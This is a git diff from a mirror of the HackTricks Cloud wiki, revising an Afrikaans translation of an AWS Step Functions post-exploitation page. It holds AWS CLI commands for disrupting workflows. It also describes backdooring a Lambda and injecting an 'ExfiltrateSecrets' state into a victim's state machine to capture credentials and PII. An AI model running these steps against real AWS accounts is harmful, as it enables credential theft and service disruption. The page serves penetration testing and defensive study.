mirror of
https://github.com/HackTricks-wiki/hacktricks-cloud.git
synced 2025-12-27 21:23:07 -08:00
Translated ['src/pentesting-cloud/aws-security/aws-post-exploitation/aws
This commit is contained in:
@@ -37,18 +37,18 @@ aws stepfunctions delete-state-machine-alias --state-machine-alias-arn <value>
|
||||
|
||||
### `states:UpdateMapRun`
|
||||
|
||||
'n Aanvaller met hierdie toestemming sou in staat wees om die Map Run mislukking konfigurasie en parallel instelling te manipuleer, en sou in staat wees om die maksimum aantal kind werksvloei uitvoerings toegelaat te verhoog of te verlaag, wat direk die diens se prestasie beïnvloed. Daarbenewens kan 'n aanvaller met die toegelate mislukking persentasie en telling mors, en in staat wees om hierdie waarde tot 0 te verlaag sodat elke keer as 'n item misluk, die hele kaart loop sou misluk, wat direk die staat masjien uitvoering beïnvloed en potensieel kritieke werksvloei ontwrigt.
|
||||
'n Aanvaller met hierdie toestemming sou in staat wees om die Map Run mislukking konfigurasie en parallelle instelling te manipuleer, en sou in staat wees om die maksimum aantal kind werksvloei uitvoerings toegelaat te verhoog of te verlaag, wat direk die diens se prestasie beïnvloed. Daarbenewens kan 'n aanvaller met die toegelate mislukking persentasie en telling mors, en in staat wees om hierdie waarde tot 0 te verlaag sodat elke keer as 'n item misluk, die hele kaart loop sou misluk, wat direk die staat masjien uitvoering beïnvloed en potensieel kritieke werksvloei ontwrigt.
|
||||
```bash
|
||||
aws stepfunctions update-map-run --map-run-arn <value> [--max-concurrency <value>] [--tolerated-failure-percentage <value>] [--tolerated-failure-count <value>]
|
||||
```
|
||||
- **Potensiële Impak**: Prestasiedegredasie en onderbreking van kritieke werksvloei.
|
||||
- **Potensiële Impak**: Prestasiedegredasie en ontwrigting van kritieke werksvloei.
|
||||
|
||||
### `states:StopExecution`
|
||||
|
||||
'n Aanvaller met hierdie toestemming kan in staat wees om die uitvoering van enige staatmasjien te stop, wat lopende werksvloei en prosesse onderbreek. Dit kan lei tot onvoltooide transaksies, gestaakte besigheidsbedrywighede, en potensiële datakorruptie.
|
||||
'n Aanvaller met hierdie toestemming kan in staat wees om die uitvoering van enige staatmasjien te stop, wat lopende werksvloei en prosesse ontwrig. Dit kan lei tot onvoltooide transaksies, gestaakte besigheidsbedrywighede en potensiële datakorruptie.
|
||||
|
||||
> [!WARNING]
|
||||
> Hierdie aksie word nie ondersteun deur **express state machines**.
|
||||
> Hierdie aksie word nie deur **express state machines** ondersteun nie.
|
||||
```bash
|
||||
aws stepfunctions stop-execution --execution-arn <value> [--error <value>] [--cause <value>]
|
||||
```
|
||||
@@ -87,7 +87,7 @@ aws stepfunctions untag-resource --resource-arn <value> --tag-keys <key>
|
||||
]
|
||||
}
|
||||
```
|
||||
...kan 'n **hoë-impak en stealthy post-exploitation aanval** uitvoer deur Lambda backdooring te kombineer met Step Function logika manipulasie.
|
||||
...kan 'n **hoë-impak en stil post-exploitatie-aanval** uitvoer deur Lambda backdooring te kombineer met Step Function logika manipulasie.
|
||||
|
||||
Hierdie scenario neem aan dat die slagoffer **AWS Step Functions gebruik om werksvloei te orkestreer wat sensitiewe invoer verwerk**, soos geloofsbriewe, tokens, of PII.
|
||||
|
||||
@@ -97,7 +97,7 @@ aws stepfunctions start-execution \
|
||||
--state-machine-arn arn:aws:states:us-east-1:<victim-account-id>:stateMachine:LegitStateMachine \
|
||||
--input '{"email": "victim@example.com", "password": "hunter2"}' --profile victim
|
||||
```
|
||||
As die Stap Funksie geconfigureer is om 'n Lambda soos `LegitBusinessLogic` aan te roep, kan die aanvaller voortgaan met **twee stil aanval variasies**:
|
||||
As die Stap Funksie geconfigureer is om 'n Lambda soos `LegitBusinessLogic` aan te roep, kan die aanvaller voortgaan met **twee stil aanvalvariante**:
|
||||
|
||||
---
|
||||
|
||||
@@ -122,9 +122,9 @@ aws lambda update-function-code \
|
||||
```
|
||||
---
|
||||
|
||||
#### Voeg 'n Kwaadwillige Toestand by die Stap Funksie
|
||||
#### Voeg 'n Kwaadwillige Toestand by die Stapfunksie
|
||||
|
||||
Alternatiewelik kan die aanvaller 'n **exfiltrasietoestand** aan die begin van die werksvloei inspuit deur die Stap Funksie-definisie op te dateer.
|
||||
Alternatiewelik kan die aanvaller 'n **uitvloeiingstoestand** aan die begin van die werksvloei inspuit deur die Stapfunksie-definisie op te dateer.
|
||||
```malicious_state_definition.json
|
||||
{
|
||||
"Comment": "Backdoored for Exfiltration",
|
||||
@@ -145,7 +145,7 @@ aws stepfunctions update-state-machine \
|
||||
--state-machine-arn arn:aws:states:us-east-1:<victim-id>:stateMachine:LegitStateMachine \
|
||||
--definition file://malicious_state_definition.json --profile attacker
|
||||
```
|
||||
Die aanvaller kan selfs meer stil wees om die staatdefinisie op te dateer na iets soos hierdie
|
||||
Die aanvaller kan selfs meer stilweg die staatdefinisie opdateer na iets soos hierdie
|
||||
{
|
||||
"Comment": "Backdoored for Exfiltration",
|
||||
"StartAt": "ExfiltrateSecrets",
|
||||
|
||||
Reference in New Issue
Block a user